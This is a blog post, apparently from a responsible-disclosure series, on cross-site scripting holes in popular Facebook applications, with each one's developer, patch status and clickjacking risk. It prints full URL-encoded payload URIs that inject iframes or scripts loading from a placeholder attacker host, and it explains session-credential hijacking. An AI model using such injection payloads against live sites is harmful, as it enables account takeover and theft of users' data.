The Social Media Security Podcast

I did not post a FAXX hack on Monday for two reasons. First, I had forgotten to factor in the long weekend (Monday is Labor Day in the US) when notifying developers, hence posting would not have allowed an actual business day to pass before releasing details. Second, I spent most all of Saturday and again Monday in bed. I haven’t been terribly sick, but I’ve been dealing with tiredness and weakness.

None of this means I’ve hit a point where I lack for material. To make up for Monday’s omission, I will be posting two hacks one day this week. I may take another break on Tuesday to ensure developers have time to patch holes, but if that happens, I’ll simply post two hacks on a second day as well. The “month of Facebook bugs” is far from over.

Facebook Verified Application

Current Monthly Active Users: 9,767,698

Current Rank on Application Leaderboard: 17

Application Developer: RockYou!

Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E

Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.

By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm

Facebook Verified Application

Current Monthly Active Users: 19,392,931

Current Rank on Application Leaderboard: 6

Application Developer: Flixster

Responsiveness: As of Sep. 4, the hole remains and I’ve had no word from Flixster. I received an e-mail from Flixster this evening confirming a fix.

Vulnerability Status: Unpatched Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/flixster/auth/account-merge?from=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fbk.flixster.com%2Ffacebook%2Fauth%2Faccount-merge%3Ffrom%3D%2522%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E

I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.

Facebook Verified Application

Current Monthly Active Users: 23,688,212

Current Rank on Application Leaderboard: 3

Application Developer: LivingSocial

Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22

Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities.  The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.

Isn’t this a just month of Facebook Application Bugs? Not exactly. While each of the vulnerabilities occur in Facebook applications, a hacker can exploit each one in powerful ways and gain access to many Facebook features. Also, such attacks are made possible by the very structure of the Facebook Platform – the fact that any of these application holes allows the same type of attack demonstrates that the problem goes beyond specific applications.

As long as the Platform remains in its current configuration, application-based attacks (FAXX = Facebook Application XSS/XSRF) will continue to be possible. I can ensure that 30 popular applications are patched, but if a 31st remains open, users are still vulnerable. If Facebook allows third-party applications to operate on their service, they cannot simply relegate security and privacy responsibilities to application developers.

These are all just XSS holes. What sort of attacks are possible with them? Each XSS hole lets an attacker hijack the session credentials of the current user, provided they’re logged into the application.  With those credentials, one can execute any Facebook API request that the application can make during the user’s session.

By default, this includes accessing a user’s full profile information, accessing the profile information of friends, accessing photos of a user or their friends, sending notifications to friends (with links), and posting feed stories on a user’s wall (with links). Notifications and feed stories would appear to come from the hijacked application. Some applications have extended permissions which can be exploited, such as updating a user’s status or publishing to their stream.

Finally, many applications allow for clickjacking installs, which means that users who have not already authorized the application (or who have exempted from the Platform altogether) are still vulnerable to an attack. I plan on releasing full source code demonstrating these attack vectors once the series comes to a close.

But the applications you do publish will be secure once they’re patched, right? Each time I evaluate an application, my goal is simply to find a hole. Once I’ve found one, I report it and move on to another application. Every application listed here could easily have other vulnerabilities that I have not yet found.

Will this really last an entire month? When I began this project, I had six holes ready to post.  Since starting the series two days ago, I’ve added two more to my list. I started by focusing on the most popular applications, meaning hundreds if not thousands have yet to be tested. Based on my experiences so far, I’m fairly confident that I will find 30 vulnerabilities by the time September finishes.